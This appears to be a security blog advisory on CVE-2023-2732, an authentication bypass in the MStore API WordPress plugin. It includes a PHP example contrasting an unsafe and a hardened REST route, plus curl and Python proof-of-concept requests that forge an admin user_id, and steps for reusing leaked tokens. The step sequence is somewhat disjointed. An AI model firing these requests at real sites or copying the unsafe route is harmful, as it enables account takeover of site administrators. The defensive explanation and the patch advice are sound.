Published: 2024-06
Summary
A critical vulnerability, CVE-2023-2732, has been discovered in the popular MStore API plugin for WordPress. This bug allows anyone—including attackers who are not logged in—to bypass authentication and log in as any user, including administrators. The vulnerability affects all MStore API versions up to and including 3.9.2.
In this long read, we'll break down what this issue is, how it works, how an attacker might exploit it, and how to fix it.
What is the MStore API Plugin?
The MStore API plugin allows users to connect their WordPress and WooCommerce stores with MStore-based mobile apps. It exposes important REST API endpoints that mobile apps use for listing products, user management, and more.
The Core Problem: Insufficient User Verification
The vulnerability lies in the MStore API's “add listing” REST API endpoint. This endpoint processes requests to add content. However, it does not properly verify that the user_id submitted in a request actually belongs to the person making the request. This means anyone can submit a request with any user_id—including an administrator's id—and the plugin will process it as if the request came from that user.
In plain English:
If an attacker knows the user ID of an account (for example, the admin is often user ID 1), they can trick the plugin into thinking they are that user—without knowing any password.
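To make the fix concrete, here is an added PHP example, written for this post and not taken from the MStore API plugin, showing the unsafe pattern described above beside a hardened WordPress REST handler. The `example-store/v1` namespace, the route names and the `example_store_add_listing` function are assumptions chosen for the illustration; the WordPress functions used (`register_rest_route`, `get_current_user_id`, `current_user_can`, `wp_insert_post`) are the standard core API.

```php
<?php
/**
 * Illustrative code, not MStore API's own: the flaw is that a REST endpoint
 * accepts anonymous callers and trusts a caller-supplied user_id as the author.
 * The hardened route below requires authentication and derives the author from
 * the session. Route and function names are assumptions for this example.
 */

add_action( 'rest_api_init', function () {

    // UNSAFE PATTERN (the class of bug described above, not the plugin's code):
    // open to anyone, and post_author comes straight from the request body.
    register_rest_route( 'example-store/v1', '/add-listing-unsafe', array(
        'methods'             => 'POST',
        'permission_callback' => '__return_true', // anonymous callers allowed
        'callback'            => function ( WP_REST_Request $request ) {
            $params = $request->get_json_params();
            return rest_ensure_response( wp_insert_post( array(
                'post_type'    => 'post',
                'post_status'  => 'publish',
                'post_title'   => sanitize_text_field( $params['title'] ?? '' ),
                'post_content' => wp_kses_post( $params['description'] ?? '' ),
                'post_author'  => (int) ( $params['user_id'] ?? 0 ), // caller-controlled
            ), true ) );
        },
    ) );

    // HARDENED: the permission callback rejects unauthenticated requests before
    // the handler runs, and the handler never trusts user_id from the body.
    register_rest_route( 'example-store/v1', '/add-listing', array(
        'methods'             => 'POST',
        'permission_callback' => function () {
            return is_user_logged_in() && current_user_can( 'edit_posts' );
        },
        'callback'            => 'example_store_add_listing',
        'args'                => array(
            'title'       => array( 'type' => 'string',  'required' => true,  'sanitize_callback' => 'sanitize_text_field' ),
            'description' => array( 'type' => 'string',  'required' => false, 'sanitize_callback' => 'wp_kses_post' ),
            'user_id'     => array( 'type' => 'integer', 'required' => false ),
        ),
    ) );
} );

/**
 * Hardened handler (assumed name): author is the authenticated user unless the
 * caller is explicitly allowed to publish on behalf of others.
 */
function example_store_add_listing( WP_REST_Request $request ) {
    $current_user = get_current_user_id();          // 0 would mean anonymous, blocked above
    $requested    = (int) $request->get_param( 'user_id' );

    // Reject, rather than silently honour, a user_id that is not the caller's own.
    if ( $requested && $requested !== $current_user && ! current_user_can( 'edit_others_posts' ) ) {
        return new WP_Error( 'rest_forbidden', 'Cannot create listings for another user.', array( 'status' => 403 ) );
    }
    if ( $requested && ! get_user_by( 'id', $requested ) ) {
        return new WP_Error( 'rest_invalid_param', 'Unknown user_id.', array( 'status' => 400 ) );
    }
    $author = $requested ? $requested : $current_user;

    $post_id = wp_insert_post( array(
        'post_type'    => 'post',
        'post_status'  => 'publish',
        'post_title'   => $request->get_param( 'title' ),
        'post_content' => (string) $request->get_param( 'description' ),
        'post_author'  => $author,
    ), true );

    if ( is_wp_error( $post_id ) ) {
        return $post_id;
    }
    return rest_ensure_response( array( 'id' => $post_id, 'author' => $author ) );
}
```

The two changes that matter are the `permission_callback`, which turns the endpoint from anonymous to authenticated, and the author check, which binds any supplied `user_id` to the session instead of trusting the body. Either one alone would have closed the specific bypass described here; doing both is the usual defence in depth for WordPress REST routes.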
1. Find a Target User ID
Most WordPress installations make the administrator the first user account (user ID = 1). Otherwise, user IDs may be easily guessed, especially on sites that show author archives or user profile URLs.
2. Craft a Malicious Request
Attackers can craft a simple POST request to the MStore API add listing endpoint. The key part is including a specific user_id in the data.
Example Snippet (Exploit PoC)
curl -X POST 'https://example.com/wp-json/mstore-api/add-listing' \
  -H 'Content-Type: application/json' \
  -d '{
    "user_id": 1,
    "title": "Test listing",
    "description": "Injected by attacker"
  }'
*This request tells the API to add a new listing as user ID 1 (likely the admin).*
3. Bypass Authentication and Gain Access
After the listing is created, depending on how the plugin integrates, the response may leak session details or tokens (such as auth cookies or JWTs) tied to the administrator.
Attackers may now use these tokens to interact further as the admin, including logging in or managing the site.
- Persistence: A foothold gained can be used to create new malicious users or install backdoors.
- SEO/Spam/Hacking: Attackers can ruin your site's reputation, SEO, and more.
Patch Status
This vulnerability is fixed in MStore API version 3.9.3.
If you use this plugin, update immediately:
Download the latest version
Python Example
import requests

url = 'https://victimsite.com/wp-json/mstore-api/add-listing'
data = {
    'user_id': 1,  # the caller-supplied id the endpoint fails to verify
    'title': 'Exploit Listing',
    'description': 'Hacked by CVE-2023-2732'
}
response = requests.post(url, json=data)
print(response.text)
Step 3: Check the Site
Now, a new listing or post appears as if created by the admin—without logging in!
Step 4: Further Attacks
If the API or plugin returns a token, cookie, or similar in the response, use it to make further authenticated requests as the admin.
References
- Wordfence Advisory on CVE-2023-2732
- WPScan Entry
- Official Plugin Page
- Patch Diff on GitHub (if available)
Conclusion
CVE-2023-2732 is a severe flaw that lets an attacker become anyone on your WordPress site, including administrators, simply by making a clever API call. The fix is quick—just update the MStore API plugin—so don’t delay!
If you run MStore API, update to the latest version immediately and always keep an eye on plugin security advisories.
*Exclusive long read by AI Security Insights. Copying permitted with link back to this post.*
Timeline
Published on: 05/25/2023 03:15:00 UTC
Last modified on: 06/01/2023 02:05:00 UTC